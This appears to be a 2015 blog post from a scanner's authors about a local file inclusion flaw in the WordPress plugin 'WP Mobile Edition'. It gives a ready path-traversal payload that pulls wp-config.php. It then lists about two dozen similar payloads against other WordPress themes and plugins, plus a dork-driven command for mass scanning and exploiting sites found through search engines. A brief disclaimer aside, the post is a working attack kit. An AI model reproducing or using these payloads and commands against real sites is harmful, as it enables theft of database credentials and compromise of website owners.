terça-feira, 9 de junho de 2015

WordPress Plugin 'WP Mobile Edition' LFI Vulnerability

Exploring wordpress plugin LFI using inurlbr in subprocess

Exploring wordpress plugin LFI using inurlbr in subprocess

Inurlbr Team
[+]=========== Assume NO ============[+]
 Liability and are not responsible
for any misuse or damage caused
 by this program!!
[+]==================================[+]

USAGE:

Make a file named payload .txt and put inside:
/wp-content/themes/mTheme-Unus/css/css.p­hp?files=../../../../wp-config.php

OTHER FAILURES(XPL's):

/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/wp-content/force-download.php?file=../wp-config.php
/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
/wp-content/themes/markant/download.php?file=../../wp-config.php
/wp-content/themes/yakimabait/download.php?file=./wp-config.php
/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
/wp-content/themes/felis/download.php?file=../wp-config.php
/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/epic/includes/download.php?file=wp-config.php
/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
/wp-content/themes/lote27/download.php?download=../../../wp-config.php
/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php


EXPLOIT COMMAND:
php inurlbr.php --dork 'inurl:?fdx_switcher=mobile' -q [your favorite engines] -s scan.txt --get-file 'payload.txt' --sub-get --unique

Vídeo:



SCANNER INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR

REF:
https://www.exploit-db.com/exploits/37244/
http://blog.inurl.com.br/2015/04/conceito-de-subprocess-scanner-inurlbr.html

Um comentário:

............